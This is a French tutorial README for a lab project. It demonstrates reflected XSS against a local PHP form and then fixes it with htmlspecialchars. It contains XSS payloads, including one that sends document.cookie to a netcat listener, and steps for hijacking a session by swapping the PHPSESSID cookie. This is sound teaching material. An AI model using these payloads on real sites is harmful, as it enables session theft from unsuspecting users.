Ce projet permet de démontrer l'exploitation d'une faille XSS et
propose ensuite une solution.

Le **Cross-Site Scripting (XSS)** est l'injection d'un script dans l'application Web qui s'exécutera ensuite dans le navigateur d'un utilisateur qui visite la page.

Le **XSS réfléchi** est une attaque qui survient lorsque l'application reçoit des données via une requête HTTP et inclut ces mêmes données dans la réponse d'une manière non sécurisée.

# Mise en œuvre
Dans le répertoire courant du projet, lancez le serveur de développement,
depuis un terminal virtuel :
```
php -S localhost:8000
```

Dans votre navigateur favori, chargez l'URL suivante :
`http://localhost:8000/formulaire.html`

## Première exploitation

Au lieu de la phrase par défaut, entrez `<script>alert("xss")</script>`,
dans le champ de saisie.

> Le script s’exécute bien, le message s'affiche dans une boîte de dialogue.
La faille a été exploitée.

## Allons plus loin

Revenez sur le formulaire et entrez `<script>alert(document.cookie)</script>`,
dans le champ de saisie de la phrase.

> La faille a été encore exploitée. Nous affichons désormais les
**cookies de sessions**  dans la boîte de dialogue.

Comment un attaquant peut-il récupérer les cookies de session (nous n'avons
pour le moment fait qu'afficher les cookies sur le navigateur de l'utilisateur) ?
Il va en fait envoyer les cookies vers son propre serveur.

## Service d'écoute

Grâce à la commande **netcat** (nc), nous pouvons lancer un service d'écoute
sur notre système. Dans un nouvel onglet du terminal virtuel, tapez :
```
nc -lv -s localhost -p 2021
```

> Nous écoutons les requêtes de localhost sur le port 2021.

Revenez sur le formulaire et entrez `<script>new Image().src="http://localhost:2021/?cookie="+document.cookie;</script>`,
dans le champ de saisie de la phrase.

> Notre script crée un objet `Image` dont la source est notre serveur d’écoute.
Le navigateur fera une requête HTTP à notre serveur, avec une URL contenant les cookies de sessions.

Dans une fenêtre de navigation privée du navigateur, chargez directement l'URL
`http://localhost:8000/traite_form.php`.

> Le script alerte que les champs de saisie n'ont pas été renseignés.

À l'aide de l'[extension] *Cookie Quick Manager*, modifiez la valeur du
cookie `PHPSESSID` de la fenêtre de navigation privée, puis rafraîchissez
la page précédente.

> Nous avons récupéré l'identité du visiteur observé.

# Solution

Le script `traite_form_secu.php` propose une solution à cette faille,
reposant sur la fonction `htmlspecialchars`, qui va permettre d'encoder
certains caractères au format HTML, afin qu'ils ne soient pas interprétés
par le navigateur, mais qu'ils restent lisibles pour le visiteur.

Pour mettre en œuvre cette solution, il suffit juste de modifier le script
appelé dans le fichier `formulaire.html` en remplaçant la valeur de l'attribut
`action` par :
`http://localhost:8000/traite_form_secu.php`.

> Le script renvoie maintenant un code HTML qui protège de l'interprétation
d'un script malveillant sur le navigateur :
`&lt;script&gt;new Image().src=&quot;http://localhost:2021/?cookie=&quot;+document.cookie;&lt;/script&gt;`


[extension]: https://addons.mozilla.org/fr/firefox/addon/cookie-quick-manager/
